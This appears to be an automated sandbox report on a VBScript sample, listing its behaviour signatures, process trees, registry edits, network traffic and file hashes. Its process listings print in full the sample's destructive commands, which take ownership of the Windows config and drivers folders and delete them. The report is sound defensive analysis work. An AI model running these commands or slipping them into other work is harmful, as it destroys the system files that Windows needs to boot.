Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-1h8e6a1alj
Target target.vbs
SHA256 ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
Tags: discovery exploit
Score: 8/10

Analysis Overview


Threat Level: Likely malicious

The file target.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Modifies registry class

Runs regedit.exe

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:40

Reported

2024-08-15 21:43

Platform

win7-20240729-en

Max time kernel

122s

Max time network

127s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

Signatures

Possible privilege escalation attempt

Tag: exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Modifies file permissions

Tag: discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2184 wrote to memory of 2804 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe
PID 2804 wrote to memory of 2640 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2804 wrote to memory of 2972 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2640 wrote to memory of 1876 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2972 wrote to memory of 2612 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2640 wrote to memory of 1744 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 2972 wrote to memory of 904 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs

MD5 84b27604951d4deb2f10cc65c8f5c8a4
SHA1 74b27bad7133462abf462923dd3d056a4d655941
SHA256 ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
SHA512 d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce

C:\Users\Admin\Desktop\EditSend.vbs

MD5 dfcef0997fe6b53193f96908bc2d7839
SHA1 bec87de5852184953fe5025aa7a6017e23deead1
SHA256 9d2e842fed982dd1f6d185c93feedacb4ac5670f61d9f1934509f159e62a6168
SHA512 ed4c7fc86525e24651e5c10533da47065d78076b47caacbb08003ed7b475ac23b41fe623b9db5330b3d947ee9df6043f2bf8c77722cab99a864ae5f7d90a2f74

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:40

Reported

2024-08-15 21:43

Platform

win10v2004-20240802-en

Max time kernel

139s

Max time network

128s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

Signatures

Possible privilege escalation attempt

Tag: exploit
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A

Modifies file permissions

Tag: discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\takeown.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A
N/A | N/A | C:\Windows\system32\icacls.exe | N/A

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*.dll\ | C:\Windows\System32\reg.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*.exe | C:\Windows\System32\reg.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*.exe\ | C:\Windows\System32\reg.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*.dll | C:\Windows\System32\reg.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\reg.exe | N/A

Runs regedit.exe

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\regedit.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2028 wrote to memory of 4984 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WScript.exe
PID 4984 wrote to memory of 2024 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 4984 wrote to memory of 3472 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\cmd.exe
PID 2024 wrote to memory of 4228 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 3472 wrote to memory of 2412 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\takeown.exe
PID 2024 wrote to memory of 3672 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 3472 wrote to memory of 4060 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\icacls.exe
PID 4984 wrote to memory of 2564 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\reg.exe
PID 4984 wrote to memory of 1332 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\reg.exe
PID 4984 wrote to memory of 3432 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCR\*.dll

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCR\*.exe

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKLM\*

C:\Windows\regedit.exe

"C:\Windows\regedit.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.237:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp
US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp
US | 52.111.229.48:443 | | tcp
US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs

MD5 84b27604951d4deb2f10cc65c8f5c8a4
SHA1 74b27bad7133462abf462923dd3d056a4d655941
SHA256 ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
SHA512 d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce

C:\Users\Admin\Desktop\DenyRedo.vbs

MD5 dfcef0997fe6b53193f96908bc2d7839
SHA1 bec87de5852184953fe5025aa7a6017e23deead1
SHA256 9d2e842fed982dd1f6d185c93feedacb4ac5670f61d9f1934509f159e62a6168
SHA512 ed4c7fc86525e24651e5c10533da47065d78076b47caacbb08003ed7b475ac23b41fe623b9db5330b3d947ee9df6043f2bf8c77722cab99a864ae5f7d90a2f74